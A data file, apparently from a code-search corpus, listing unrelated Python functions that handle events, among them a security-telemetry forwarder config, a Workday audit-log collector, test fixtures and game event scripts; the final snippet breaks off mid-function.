[ "def set_capture_events_from_config(self):\n\n event_config = [\n {\n \"config_key\": \"events_watchlist\",\n \"events\": [\n \"watchlist.hit.process\",\n \"watchlist.hit.binary\",\n \"watchlist.storage.hit.process\",\n \"watchlist.storage.hit.binary\"\n ],\n \"options\": self.forwarder_options.get(\"wlhitnotifenabled\", \"0\")\n },\n {\n \"config_key\": \"events_feed\",\n \"events\": [\n \"feed.ingress.hit.process\",\n \"feed.ingress.hit.binary\",\n \"feed.ingress.hit.host\",\n \"feed.storage.hit.process\",\n \"feed.storage.hit.binary\",\n \"feed.query.hit.process\",\n \"feed.query.hit.binary\"\n ],\n \"options\": self.forwarder_options.get(\"feedhitnotif\", \"0\")\n },\n {\n \"config_key\": \"events_alert\",\n \"events\": [\n \"alert.watchlist.hit.ingress.process\",\n \"alert.watchlist.hit.ingress.binary\",\n \"alert.watchlist.hit.ingress.host\",\n \"alert.watchlist.hit.query.process\",\n \"alert.watchlist.hit.query.binary\"\n ],\n \"options\": self.forwarder_options.get(\"alertnotifenabled\", \"0\")\n },\n {\n \"config_key\": \"events_raw_sensor\",\n \"events\": [\n \"ingress.event.process\",\n \"ingress.event.procstart\",\n \"ingress.event.netconn\",\n \"ingress.event.procend\",\n \"ingress.event.childproc\",\n \"ingress.event.moduleload\",\n \"ingress.event.module\",\n \"ingress.event.filemod\",\n \"ingress.event.regmod\"\n \t\"ingress.event.tamper\",\n \t\t\"ingress.event.crossprocopen\",\n \t\t\"ingress.event.remotethread\",\n \t\t\"ingress.event.processblock\",\n \t\t\"ingress.event.emetmitigation\",\n ],\n \"options\": self.forwarder_options.get(\"rawsensnotifenabled\", \"0\")\n },\n {\n \"config_key\": \"events_binary_observed\",\n \"events\": [\"binaryinfo.host.observed\",\n \"binaryinfo.observed,\"\n \"binaryinfo.group.observed\"],\n\n \"options\": self.forwarder_options.get(\"binobsnotifenabled\", \"0\")\n },\n {\n \"config_key\": \"events_binary_upload\",\n \"events\": [\"binarystore.file.added\"],\n \"options\": self.forwarder_options.get(\"binuplnotifenabled\", \"0\")\n }\n ]\n\n self.capture_events = []\n for event_type in event_config:\n events = self.forwarder_options.get(event_type[\"config_key\"], \"0\").lower()\n if events == \"all\":\n self.capture_events.extend(event_type[\"events\"])\n elif events != \"0\":\n events_from_config = events.split(\",\")\n events_to_capture = list(set(events_from_config) & set(event_type[\"events\"]))\n self.capture_events.extend(events_to_capture)\n\n self.logger.info(\"Configured to capture events: %s\" % self.capture_events)", "def get_events(self):\n raise NotImplementedError", "def get_events(self):\n raise NotImplementedError", "def get_rp_waf_events(isamAppliance, instance, date, duration, type, check_mode=False,\n force=False):\n return isamAppliance.invoke_get(\n \"Retrieving security action events for a Reverse Proxy instance\",\n \"/analysis/reverse_proxy_traffic/pam_events{0}\".format(\n tools.create_query_string(\n date=date,\n duration=duration,\n instance=instance,\n type=type)),requires_model=requires_model)", "def required_event_keys(cls):\n return {'app_type', 'destination_function_name', 'schedule_expression'}", "def address_mapped_event(self, event):\r\n output = [event.event_name, event.from_addr, event.to_addr, \r\n time.asctime(event.when)]\r\n plog(\"DEBUG\", \" \".join(output))", "def get_events(self):\n #Returne the capture events\n raise NotImplementedError", "def get_events(self):\n #Returne the capture events\n raise NotImplementedError", "def _extract_complement_events(self):\n\t\ttry:\n\t\t\ttable = self.hdf5file[fastq_paths[self.version]['complement'] % self.group]\n\t\t\tself.complement_events = [Event(x) for x in table['Events'][()]]\n\t\texcept Exception, e:\n\t\t\tself.complement_events = []", "def forwarder_state_changed(self, ev):\n\n\n dp = ev.dp\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n\n\n if ev.enter is True:\n # in plain MAC setup, this should install only ICMP and ARP re-route rules, watchout for hardcoded DP id\n self.on_inner_dp_join(dp)\n\t ##For evry new forwarder we send out discovery ICMP packets out of every port except OFPP_CONTROLLER\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' saying hello to Unifycore Controller, Unifycore warmly welcomes you!')\n for port in dp.ports:\n if port != (ofp.OFPP_CONTROLLER):\n LOG.debug('TOPO MNGR: Controller is sending topology discovery ICMPs to forwarder: ' + str(dp.id) + ', port: ' + str(port))\n _icmp_send(dp,port,DISCOVERY_IP_SRC, DISCOVERY_IP_DST)\n\n ##For evry new forwarder we send out discovery ARP packets out of every port except OFPP_CONTROLLER to find APN\n for apn in APN_POOL:\n if apn.ip_addr != None:\n LOG.debug('TOPO MNGR: Forwarder: '+str(dp.id)+', port: '+ str(port) + ' is looking for APN: ' + str(apn.name) +' at IP: '+str(apn.ip_addr)+' with ARP search source IP: ' + str(apn.arp_origin_ip))\n _arp_send(dp=dp, port_out=port, arp_code=1, ip_target=apn.ip_addr, ip_sender=apn.arp_origin_ip)\n\n\n\n\n\n if ev.enter is False:\n\t ##TODO: We need to scan if any tunnels were affected, and if so, if any PDP COntexts were affected\n ##JUST REMOVING NODE FROM TOPOLOGY ISNT ENOUGH!\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is leaving topology. It was a pleasure for us!')\n topo.del_forwarder(dp.id)", "def event_pattern(self):\n pass # pragma: no cover", "def respond_to_events(self):\n event_response = MessageEventHandler(self.state, self.meta_data, self.message_data).handle_events(events=self.events)\n\n if event_response == []:\n return {}\n return event_response[0]", "def parse_event(self):\n event_id = self.replay.read_string()\n group = self.replay.read_string()\n metadata = self.replay.read_string()\n start_time = self.replay.read_uint32()\n end_time = self.replay.read_uint32()\n size = self.replay.read_uint32()\n\n buffer = self.decrypt_buffer(size)\n\n if group == EventTypes.PLAYER_ELIMINATION.value:\n try:\n self.parse_elimination_event(buffer, start_time)\n except:\n logger.error(\"Couldnt parse event PLAYER_ELIMINATION\")\n\n if metadata == EventTypes.MATCH_STATS.value:\n self.parse_matchstats_event(buffer)\n\n if metadata == EventTypes.TEAM_STATS.value:\n self.parse_teamstats_event(buffer)", "def is_eiffel_event_type(event, event_type):\n return event['meta']['type'] == event_type", "def test_custom_query_response_descriptor_octopus_server_web_api_actions_list_event_agents_responder(self):\n pass", "def genlocationevents(self):\n # By default, CORE generates EMANE location events when nodes\n # are moved; this can be explicitly disabled in core.conf\n tmp = self.session.get_config_item_bool(\"emane_event_generate\")\n if tmp is None:\n tmp = not self.doeventmonitor()\n return tmp", "def get_event_list(self):\n pass", "def test_queue_attn_xfer(self):\n events = self.run_and_get_events('fixtures/queue/queue_attn_xfer.json')\n\n expected_events = self.events_from_tuples((\n ('on_b_dial', {\n 'call_id': 'e83df36bebbe-1507037906.116',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'to_number': '+31150010004',\n 'targets': [CallerId(code=150010002, number='+31150010004', is_public=True)],\n }),\n ('on_up', {\n 'call_id': 'e83df36bebbe-1507037906.116',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'to_number': '+31150010004',\n 'callee': CallerId(code=150010002, number='+31150010004', is_public=True),\n }),\n ('on_b_dial', {\n 'call_id': 'e83df36bebbe-1507037917.120',\n 'caller': CallerId(code=150010002, number='202', name=\"Samantha Graham\", is_public=True),\n 'to_number': '203',\n 'targets': [CallerId(code=150010003, number='203', is_public=True)],\n }),\n ('on_up', {\n 'call_id': 'e83df36bebbe-1507037917.120',\n 'caller': CallerId(code=150010002, number='202', name=\"Samantha Graham\", is_public=True),\n 'to_number': '203',\n 'callee': CallerId(code=150010003, number='203', is_public=True),\n }),\n ('on_warm_transfer', {\n 'new_id': 'e83df36bebbe-1507037917.120',\n 'merged_id': 'e83df36bebbe-1507037906.116',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'callee': CallerId(code=150010003, number='203', is_public=True),\n 'redirector': CallerId(code=150010002, number='202', name=\"Samantha Graham\", is_public=True),\n }),\n ('on_hangup', {\n 'call_id': 'e83df36bebbe-1507037917.120',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'to_number': '203',\n 'reason': 'completed',\n }),\n ))\n\n self.assertEqual(expected_events, events)", "def available_events(self):\n return self.target.read_value(self.available_events_file).splitlines()", "def test_custom_query_response_descriptor_octopus_server_web_api_actions_list_events_responder(self):\n pass", "def handle_events( events, model, arguments = DEFAULT_ARGUMENTS):\n unhandled_events = {}\n \n # pass 1 all events\n for event_id in events:\n event = events[event_id]\n \n if STANDOFF_EVENT_TO_SBO_MAPPING.get( event.type_lower) is None:\n # event is unknown\n logging.getLogger( \"st2sbml\").warning( \"{0} event {1} unhandled, because unknown\".format( get_path( arguments), event))\n elif event.type_lower == \"pathway\":\n pass # do nothing for pathways (entities have already been added)\n # handle localization (special handling)\n elif event.type_lower in [ \"localization\", \"transport\"]: \n handle_localization( event, model, arguments = arguments);\n # handle regulation events (special handling)\n elif event.type_lower in [\"regulation\", \"positive_regulation\", \"negative_regulation\", \"activation\", \"inactivation\", \"catalysis\"]:\n unhandled_event = handle_regulation( event, model, arguments = arguments);\n if not unhandled_event is None:\n unhandled_events.update( unhandled_event);\n elif event.type_lower in [\"gene_expression\", \"transcription\", \"translation\"]:\n handle_gene_expression( event, model, arguments = arguments);\n # not all roles are entities\n elif not all( [ isinstance( role[1] , parse_standoff.EntityTrigger) for role in event.roles]):\n logging.getLogger( \"st2sbml\").warning( \"{0} event {1} unhandled. Some roles are events, which is not allowed for this event type\".format( get_path( arguments), event))\n # everything else: Conversion, Acetylation, Deacetylation, Demethylation, Dephosphorylation, Deubiquitination, Methylation, Phosphorylation, Ubiquitination\n else: \n # add reaction\n reaction = add_reaction( event, model, arguments = arguments);\n \n # handle products -> add as product\n for product in event.get_roles( \"product\"):\n add_product( product.id, reaction, model, arguments = arguments);\n # handle themes -> add as reactants\n for theme in event.get_roles( \"theme\"):\n add_reactant( theme.id, reaction, model, arguments = arguments);\n # handle comp -> add as reactants\n for comp in event.get_roles( \"complex\"):\n add_reactant( comp.id, reaction, model, arguments = arguments);\n # handle Participant -> add as product\n for comp in event.get_roles( \"participant\"):\n add_reactant( comp.id, reaction, model, arguments = arguments);\n # handle causes -> add as modifiers\n for cause in event.get_roles( \"cause\"):\n add_modifier( cause.id, reaction, model, arguments = arguments);\n for site in event.get_roles( \"site\"):\n add_note( \"Site: {0}\".format( site.text), reaction, arguments = arguments);\n\n # check if there are any unhandled roles\n for unhandled_role in set([role[0] for role in event.roles]).difference([\"theme\", \"cause\", \"product\", \"site\", \"participant\", \"complex\"]):\n logging.getLogger( \"st2sbml\").warning( \"{0} event {1} role {2} not handled, because unknown.\".format( get_path( arguments), event, unhandled_role))\n\n\n # pass 2 all unhandled events\n for event_id in unhandled_events:\n event = events[event_id]\n unhandled_roles = unhandled_events[event_id]\n handle_unhandled_event( event, unhandled_roles, model, arguments = arguments);", "def test_custom_query_response_descriptor_octopus_server_web_api_actions_list_events_responder_spaces(self):\n pass", "def get_events_need_escalation(self, source_type: str) -> List[EventRecord]:\n with self.session.begin() as session:\n events_to_escalate = (\n session.query(EventRecord)\n .filter(\n (EventRecord.sent_at.isnot(None))\n & (EventRecord.escalated_at.is_(None))\n & (EventRecord.source_type == source_type)\n )\n .outerjoin(IgnoreFingerprintRecord, EventRecord.fingerprint == IgnoreFingerprintRecord.fingerprint)\n .filter(IgnoreFingerprintRecord.ignore_type == IgnoreFingerprintRecord.ESCALATE_MANUALLY)\n .all()\n )\n return events_to_escalate", "def determine_emitter(cls, request):\r\n default_emitter = cls._meta.emitters[0]\r\n if not request:\r\n return default_emitter\r\n\r\n if request.method == 'OPTIONS':\r\n return JSONEmitter\r\n\r\n accept = request.META.get('HTTP_ACCEPT', '*/*')\r\n if accept == '*/*':\r\n return default_emitter\r\n\r\n base_format = mimeparse.best_match(cls._meta.emitters_dict.keys(),\r\n accept)\r\n return cls._meta.emitters_dict.get(\r\n base_format,\r\n default_emitter)", "def test_custom_query_response_descriptor_octopus_server_web_api_actions_list_event_agents_responder_spaces(self):\n pass", "def test_otoroshi_controllers_adminapi_analytics_controller_filterable_events(self):\n pass", "def test_load_response_descriptor_events_event_event_resource(self):\n pass", "def _send_events(self, payloads, combined_events=False):\n try:\n udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n if not combined_events:\n for payload in payloads:\n print payload\n udp_socket.sendto(payload, self.statsd_addr)\n else:\n # send multiple events per packet\n payload = self.combine_key.join(payloads)\n udp_socket.sendto(payload, self.statsd_addr)\n except Exception:\n self.logger.exception(\"Error sending statsd event\")", "def get_events(self):\n disallowed = [ident(self.add_event.__func__), ident(ident)]\n self.frames = None\n\n return [item for item in self.events if item[2] not in disallowed]", "def all_events_request():\n result = []\n message = json.loads(request.stream.read().decode('utf-8'))\n for ruleset_name in host.list_rulesets():\n result.append(host.post(ruleset_name, message))\n return jsonify(result)", "def events(self):", "def events_info(request):\n \n global input\n \n if request == 'event-based':\n client_neries = Client_neries()\n \n events = client_neries.getEvents(min_datetime=input['min_date'], \\\n max_datetime=input['max_date'], min_magnitude=input['min_mag'], \\\n max_magnitude=input['max_mag'], min_latitude=input['evlatmin'], \\\n max_latitude=input['evlatmax'], min_longitude=input['evlonmin'], \\\n max_longitude=input['evlonmax'], min_depth = input['min_depth'], \\\n max_depth=input['max_depth'], max_results=input['max_result'])\n \n for i in range(0, len(events)):\n events[i]['t1'] = events[i]['datetime'] - input['preset']\n events[i]['t2'] = events[i]['datetime'] + input['offset']\n \n elif request == 'continuous':\n m_date = UTCDateTime(input['min_date'])\n M_date = UTCDateTime(input['max_date'])\n \n t_cont = M_date - m_date\n \n events = []\n \n if t_cont > input['interval']:\n num_div = int(t_cont/input['interval'])\n t_res = t_cont - num_div*input['interval']\n \n for i in range(0, num_div):\n events.append({'author': 'NAN', 'event_id': 'continuous' + str(i), \\\n 'origin_id': -12345.0, 'longitude': -12345.0, \\\n 'datetime': m_date + i*input['interval'], \\\n 't1': m_date + i*input['interval'],\\\n 't2': m_date + (i+1)*input['interval'] + 60.0,\\\n 'depth': -12345.0, 'magnitude': -12345.0, \\\n 'magnitude_type': 'NAN', 'latitude': -12345.0, \\\n 'flynn_region': 'NAN'})\n \n events.append({'author': 'NAN', 'event_id': 'continuous' + str(i+1), \\\n 'origin_id': -12345.0, 'longitude': -12345.0, \\\n 'datetime': m_date + (i+1)*input['interval'], \\\n 't1': m_date + (i+1)*input['interval'],\\\n 't2': M_date,\\\n 'depth': -12345.0, 'magnitude': -12345.0, \\\n 'magnitude_type': 'NAN', 'latitude': -12345.0, \\\n 'flynn_region': 'NAN'})\n else:\n events.append({'author': 'NAN', 'event_id': 'continuous0', \\\n 'origin_id': -12345.0, 'longitude': -12345.0, \\\n 'datetime': m_date, \\\n 't1': m_date,\\\n 't2': M_date,\\\n 'depth': -12345.0, 'magnitude': -12345.0, \\\n 'magnitude_type': 'NAN', 'latitude': -12345.0, \\\n 'flynn_region': 'NAN'})\n\n return events", "def describe_events(ServerName=None, NextToken=None, MaxResults=None):\n pass", "def get_events(self):\n return self.events", "def collect_events(helper, ew):\n\n '''\n # The following example writes a random number as an event. (Multi Instance Mode)\n # Use this code template by default.\n import random\n data = str(random.randint(0,100))\n event = helper.new_event(source=helper.get_input_type(), index=helper.get_output_index(), sourcetype=helper.get_sourcetype(), data=data)\n ew.write_event(event)\n '''\n\n '''\n # The following example writes a random number as an event for each input config. (Single Instance Mode)\n # For advanced users, if you want to create single instance mod input, please use this code template.\n # Also, you need to uncomment use_single_instance_mode() above.\n import random\n input_type = helper.get_input_type()\n for stanza_name in helper.get_input_stanza_names():\n data = str(random.randint(0,100))\n event = helper.new_event(source=input_type, index=helper.get_output_index(stanza_name), sourcetype=helper.get_sourcetype(stanza_name), data=data)\n ew.write_event(event)\n '''\n\n if helper.get_log_level() == \"DEBUG\":\n import traceback\n debug = True\n else:\n debug = False\n\n try:\n # Construct Workday client from the provided global config\n rest_api_endpoint = helper.get_global_setting(\"rest_api_endpoint\")\n token_endpoint = helper.get_global_setting(\"token_endpoint\")\n client_id = helper.get_global_setting(\"client_id\")\n client_secret = helper.get_global_setting(\"client_secret\")\n refresh_token = helper.get_global_setting(\"refresh_token\")\n\n empty_fields = []\n if not rest_api_endpoint:\n empty_fields.append(\"Workday REST API Endpoint\")\n if not token_endpoint:\n empty_fields.append(\"Token Endpoint\")\n if not client_id:\n empty_fields.append(\"Client ID\")\n if not client_secret:\n empty_fields.append(\"Client Secret\")\n if not refresh_token:\n empty_fields.append(\"Refresh Token\")\n if len(empty_fields) > 0:\n raise ValueError(\"Empty fields in global configuration: {}\".format(\", \".join(empty_fields)))\n\n wday = Workday(rest_api_endpoint, token_endpoint, client_id, client_secret, refresh_token, http_user_agent=USER_AGENT, helper=helper)\n except ValueError as e:\n helper.log_error(str(e))\n if debug: helper.log_debug(\"\".join(traceback.format_exc()))\n sys.exit(1)\n\n stanza_names = helper.get_input_stanza_names()\n if not isinstance(stanza_names, list):\n stanza_names = [stanza_names]\n\n for stanza_name in stanza_names:\n input_type = helper.get_input_type()\n input_name = helper.get_arg(\"input_name\")\n include_target = helper.get_arg(\"include_target\")\n\n index = helper.get_output_index(stanza_name)\n sourcetype = \"workday:{}\".format(input_name)\n\n if input_name == \"user_activity\":\n\n # Pull checkpoint value and setup query range for this run\n # Only pull up to 5 minutes in the past to allow time for events to be available in the report\n checkpoint_format = \"%Y-%m-%dT%H:%M:%SZ\"\n end = datetime.datetime.utcnow() - datetime.timedelta(minutes=5)\n start = helper.get_check_point(input_name)\n if start is None:\n start = end\n helper.log_info(\"No timestamp checkpoint found for input \\\"{}\\\", starting from now ({})\".format(\n input_name,\n start.strftime(checkpoint_format)\n ))\n # Save current time now to preserve original start time in case of errors\n helper.save_check_point(input_name, end.strftime(checkpoint_format))\n\n else:\n # Confirm that the checkpoint is in the correct format\n try:\n start = datetime.datetime.strptime(start, checkpoint_format)\n except ValueError as e:\n helper.log_error(\"Invalid checkpoint value for input \\\"{}\\\", aborting ({})\".format(input_name, str(e)))\n continue\n\n\n helper.log_info(\"Starting input \\\"{}\\\" for window ({}, {})\".format(\n input_name,\n start.strftime(checkpoint_format),\n end.strftime(checkpoint_format)\n ))\n\n try:\n input_start = time.time()\n results = list(wday.audit_logs(start, end, include_target=include_target))\n\n except requests.exceptions.ConnectionError as e:\n helper.log_error(\"Unable to connect to host\")\n if debug: helper.log_debug(\"\".join(traceback.format_exc()))\n\n except requests.exceptions.Timeout as e:\n helper.log_error(\"Request timed out, retries exhausted\")\n if debug: helper.log_debug(\"\".join(traceback.format_exc()))\n\n except requests.exceptions.HTTPError as e:\n helper.log_error(\"Request failed with error code ({}), retries exhausted\".format(e.response.status_code))\n if debug: helper.log_debug(\"\".join(traceback.format_exc()))\n\n except Exception as e:\n helper.log_error(\"Unknown exception occurred ({})\".format(str(e)))\n if debug: helper.log_debug(\"\".join(traceback.format_exc()))\n\n else:\n\n # Deliberately wait to write events until all are collected with no errors\n # otherwise errors or restarts could cause missing / duplicate events\n for result in results:\n event = helper.new_event(\n source = input_type,\n index = index,\n sourcetype = sourcetype,\n data = json.dumps(result)\n )\n ew.write_event(event)\n\n input_runtime = time.time() - input_start\n event_count = len(results)\n helper.log_info(\"Finished input \\\"{}\\\" for window ({}, {}) in {} seconds, {} events written\".format(\n input_name,\n start.strftime(checkpoint_format),\n end.strftime(checkpoint_format),\n round(input_runtime, 2),\n event_count\n ))\n\n helper.save_check_point(input_name, end.strftime(checkpoint_format))\n\n else:\n helper.log_warning(\"Invalid input \\\"{}\\\", supported values are \\\"{}\\\"\".format(input_name, \"|\".join(VALID_INPUTS)))", "def event706():\n header(706, 0)\n\n if_event_flag_on(-1, 710)\n if_event_flag_on(-1, EVENT.WarpAbilityAtSunChamber)\n if_condition_true(0, -1)\n\n flag.enable(706) # Enable warping.\n\n # WARPING IS ACTIVE WHILE PENDING HERE.\n\n if_event_flag_on(-1, 11705170) # Player in Archive Tower ...\n if_in_world_area(-1, 11, 0) # OR player in Painted World ...\n if_in_world_area(7, 15, 1) # OR (Player in Anor Londo AND Dark Anor Londo active AND Jareel not dead)\n if_event_flag_on(7, 11510400)\n if_event_flag_off(7, 11510901)\n if_condition_true(-1, 7)\n if_in_world_area(6, 14, 1) # OR (Player in Lost Izalith AND Jeremiah present)\n if_event_flag_on(-2, EVENT.JeremiahInRuins)\n if_event_flag_on(-2, EVENT.JeremiahInIzalith)\n if_event_flag_on(-2, EVENT.JeremiahImpatient)\n if_event_flag_on(-2, EVENT.JeremiahFleeingIzalith)\n if_condition_true(6, -2)\n if_condition_true(-1, 6)\n if_condition_true(0, -1)\n flag.disable(706)\n\n # WARPING IS NOT ACTIVE WHILE PENDING HERE.\n\n if_event_flag_off(1, 11705170) # Player not in Archive Tower ...\n if_not_in_world_area(1, 11, 0) # AND player not in Painted World ...\n if_not_in_world_area(-7, 15, 1) # AND (player not in AL OR not Dark Anor Londo OR Jareel dead)\n if_event_flag_off(-7, 11510400)\n if_event_flag_on(-7, 11510901)\n if_condition_true(1, -7)\n if_not_in_world_area(-6, 14, 1) # AND (player not in Izalith OR Jeremiah gone)\n if_event_flag_off(2, EVENT.JeremiahInRuins)\n if_event_flag_off(2, EVENT.JeremiahInIzalith)\n if_event_flag_off(2, EVENT.JeremiahImpatient)\n if_event_flag_off(2, EVENT.JeremiahFleeingIzalith)\n if_condition_true(-6, 2)\n if_condition_true(1, -6)\n if_condition_true(0, 1)\n restart()", "def customEvent(self, e):\n data = e.data()\n \n ## HOST INFO\n \n if data.find('host up') == 0:\n self.emit(PYSIGNAL('host_up'), (data.split(' ')[2],))\n\n elif data.find('host down') == 0:\n self.emit(PYSIGNAL('host_down'), (data.split(' ')[2],))\n\n elif data.find('add group') == 0:\n self.emit(PYSIGNAL('add_group'), (int(data.split(' ')[2]),))\n\n elif data.find('remove group') == 0:\n self.emit(PYSIGNAL('remove_group'), (int(data.split(' ')[2]),))\n\n elif data.find('group beat') == 0:\n self.emit(PYSIGNAL('group_beat'), (data[11:],))\n \n ## PKAUDIOD\n \n elif data.find('midi') == 0:\n l = data.split(' ')[1:]\n data = [int(l[0]),int(l[1]),int(l[2]),float(l[3])]\n self.emit(PYSIGNAL('midi'), (data,))\n \n elif data.find('sample:starting') == 0:\n l = data.split(' ')\n self.emit(PYSIGNAL('local_sample_starting'), (int(l[1]),))", "def convert_option_to_events(self, option, option_type):\n if option_type == \"action\":\n name = option[0] if isinstance(option, tuple) else option\n if name == \"tax\":\n claimed = \"Duke\"\n elif name == \"steal\":\n claimed = \"Captain\"\n elif name == \"exchange\":\n claimed = \"Ambassador\"\n elif name == \"assassinate\":\n claimed = \"Assassin\"\n else:\n claimed = None\n return [{\"event\": \"action\", \"info\": {\"type\": name, \"as_character\": claimed, \"from_player\": self.id,\n \"target\": None if isinstance(option, str) else option[1]}}]\n elif option_type == \"reaction\":\n return [{\"event\": \"reaction\", \"info\": {\"type\": option[0], \"from\": self.id, \"as_character\": option[1]}}]\n elif option_type == \"card_selection\":\n return [{\"event\": \"card_loss\", \"info\": {\"character\": self.cards[option][\"character\"], \"player\": self.id}}]\n elif option_type == \"exchange\":\n events = []\n alive_cards = [c for c in self.cards if c[\"alive\"]]\n for i in range(len(alive_cards)):\n events.append({\"event\": \"card_swap\",\n \"info\": {\"from\": alive_cards[i][\"character\"],\n \"to\": option[i], \"player\": self.id}})\n return events", "async def events(self) -> Iterable[Event]:", "def get_events_list(self, opts, args):\n\n\t\timport events\n\n\t\tself.setup_listener_gettext()\n\n\t\t# we need to merge, because some events have only\n\t\t# handlers, and others have only callbacks.\n\t\tevents_names = set(events.events_handlers.keys()\n\t\t\t\t\t\t\t+ events.events_callbacks.keys())\n\t\tmax_name_len = max(len(x) for x in events_names)\n\n\t\tif opts.verbose >= verbose.INFO:\n\t\t\tremote_output(_(u'{0} distinct event(s), {1} handler(s) '\n\t\t\t\t\tu'and {2} callback(s)').format(len(events_names),\n\t\t\t\t\tsum(len(x) for x in events.events_handlers.itervalues()),\n\t\t\t\t\tsum(len(x) for x in events.events_callbacks.itervalues())\n\t\t\t\t\t) + u'\\n')\n\t\t\tfor event_name in events_names:\n\t\t\t\thandlers = events.events_handlers.get(event_name, ())\n\t\t\t\tcallbacks = events.events_callbacks.get(event_name, ())\n\n\t\t\t\tremote_output(_(u'Event: {0}\\n\\tHandlers:{1}{2}\\n'\n\t\t\t\t\t\tu'\\tCallbacks:{3}{4}\\n').format(\n\t\t\t\t\tstylize(ST_NAME, event_name),\n\t\t\t\t\tu'\\n\\t\\t' if len(handlers) else u'',\n\t\t\t\t\tu'\\n\\t\\t'.join(_(u'{0} in module {1}').format(\n\t\t\t\t\t\tstylize(ST_NAME, h.__name__),\n\t\t\t\t\t\tstylize(ST_COMMENT, h.__module__)) for h\n\t\t\t\t\t\t\tin handlers),\n\t\t\t\t\tu'\\n\\t\\t' if len(callbacks) else u'',\n\t\t\t\t\tu'\\n\\t\\t'.join(_(u'{0} in module {1}').format(\n\t\t\t\t\t\tstylize(ST_NAME, c.__name__),\n\t\t\t\t\t\tstylize(ST_COMMENT, c.__module__)) for c\n\t\t\t\t\t\t\tin callbacks),\n\t\t\t\t))\n\t\telse:\n\t\t\tfor event_name in events_names:\n\t\t\t\tremote_output(_(u'{0}: {1} handler(s), {2} callback(s).\\n').format(\n\t\t\t\t\t\t\tstylize(ST_NAME, event_name.rjust(max_name_len)),\n\t\t\t\t\t\t\tlen(events.events_handlers.get(event_name, ())),\n\t\t\t\t\t\t\tlen(events.events_callbacks.get(event_name, ())),\n\t\t\t\t\t\t))", "def wants_event(self, event_name: str, args: Dict) -> bool:\n ret = True\n if self.event_filter and event_name not in self.event_filter:\n ret = False\n elif self.active_monitor_filter and 'monitor' in args and args['monitor'].monitor_type == 'active' \\\n and args['monitor'].id not in self.active_monitor_filter:\n ret = False\n return ret", "def either_events(self, Rover, name1, name2):\n func1 = self.event.get(name1)\n func2 = self.event.get(name2)\n return func1(Rover) or func2(Rover)", "def event_type(self) -> int:\n return self.data[\"args\"][\"eventType\"]", "def do(self, dispatcher, monitor):\n events = []\n\n monitor.notify(self.timestamp, DRIVER, DROPOFF,\n self.driver.identifier, self.driver.destination)\n\n self.driver.end_ride()\n\n # Once a driver drops off a rider, this driver submits a new request.\n events.append(DriverRequest(self.timestamp, self.driver))\n\n return events", "def calculate_events(self):\n\n self.events = []\n\n # birth flows\n for label, var_label in self.var_entry_rate_flow:\n self.events.append((None, label, self.vars[var_label]))\n\n # dynamic transmission flows\n for from_label, to_label, var_label in self.var_transfer_rate_flows:\n val = self.compartments[from_label] * self.vars[var_label]\n if val > 0:\n self.events.append((from_label, to_label, val))\n\n # fixed-rate flows\n for from_label, to_label, rate in self.fixed_transfer_rate_flows:\n val = self.compartments[from_label] * rate\n if val > 0:\n self.events.append((from_label, to_label, val))\n\n # background death flows\n self.vars['rate_death'] = 0.\n for label in self.labels:\n val = self.compartments[label] * self.background_death_rate\n if val > 0:\n self.vars['rate_death'] += val\n self.events.append((label, None, val))\n\n # extra infection-related death flows\n self.vars['rate_infection_death'] = 0.\n for label, rate in self.infection_death_rate_flows:\n val = self.compartments[label] * rate\n if val > 0:\n self.vars['rate_infection_death'] += val\n self.events.append((label, None, val))", "def get_hosts_fanout(self, target, listener_type):", "def process_event(self, event):\n options = {\n Actions.Spawned: self.process_spawned_event,\n Actions.Walked: self.process_walked_event,\n Actions.Ate: None,\n Actions.Eaten: self.process_died_event,\n Actions.Mitosed: None,\n Actions.Died: self.process_died_event,\n Actions.Expired: self.process_died_event,\n Actions.NoAction: None,\n }\n if options[event.action] is not None:\n print(event)\n print('-'*32)\n options[event.action](event)", "def json_get_event():\n t0 = time.time()\n try:\n args = request.args\n if args:\n print(f\"got request args: {args}\")\n else:\n args = json.loads(request.data)\n print(f\"got request data: {args}\")\n uuid = args.get(\"uuid\")\n if not uuid:\n print(\"bp.scene.routes.json_get_person_families: Missing uuid\")\n return jsonify(\n {\"records\": [], \"status\": Status.ERROR, \"statusText\": \"Missing uuid\"}\n )\n\n u_context = UserContext(user_session, current_user, request)\n with EventReader(\"read\", u_context) as service:\n # reader = EventReader(readservice, u_context)\n res = service.get_event_data(uuid, args)\n\n status = res.get(\"status\")\n if status != Status.OK:\n flash(f'{_(\"Event not found\")}: {res.get(\"statustext\")}', \"error\")\n if status != Status.OK:\n return jsonify(\n {\n \"event\": None,\n \"members\": [],\n \"statusText\": _(\"No event found\"),\n \"status\": status,\n }\n )\n # Event\n event = res.get(\"event\", None)\n event.type_lang = jinja_filters.translate(event.type, \"evt\").title()\n # Event members\n members = res.get(\"members\", [])\n for m in members:\n if m.label == \"Person\":\n m.href = \"/scene/person?uuid=\" + m.uuid\n m.names[0].type_lang = jinja_filters.translate(m.names[0].type, \"nt\")\n elif m.label == \"Family\":\n m.href = \"/scene/family?uuid=\" + m.uuid\n m.role_lang = jinja_filters.translate(m.role, \"role\") if m.role else \"\"\n # Actually there is one place and one pl.uppers\n places = res.get(\"places\", [])\n for pl in places:\n pl.href = \"/scene/location/uuid=\" + pl.uuid\n pl.type_lang = jinja_filters.translate(pl.type, \"lt\").title()\n for up in pl.uppers:\n up.href = \"/scene/location/uuid=\" + up.uuid\n up.type_lang = jinja_filters.translate(up.type, \"lt_in\").title()\n # Event notes\n notes = res.get(\"notes\", [])\n # Medias\n medias = res.get(\"medias\", [])\n for m in medias:\n m.href = \"/scene/media?uuid=\" + m.uuid\n\n res_dict = {\n \"event\": event,\n \"members\": members,\n \"notes\": notes,\n \"places\": places,\n \"medias\": medias,\n \"allow_edit\": u_context.allow_edit,\n \"translations\": {\"myself\": _(\"Self\")},\n }\n response = StkEncoder.jsonify(res_dict)\n # print(response)\n t1 = time.time() - t0\n stk_logger(\n u_context, f\"-> bp.scene.routes.json_get_event n={len(members)} e={t1:.3f}\"\n )\n return response\n\n except Exception as e:\n traceback.print_exc()\n return jsonify(\n {\n 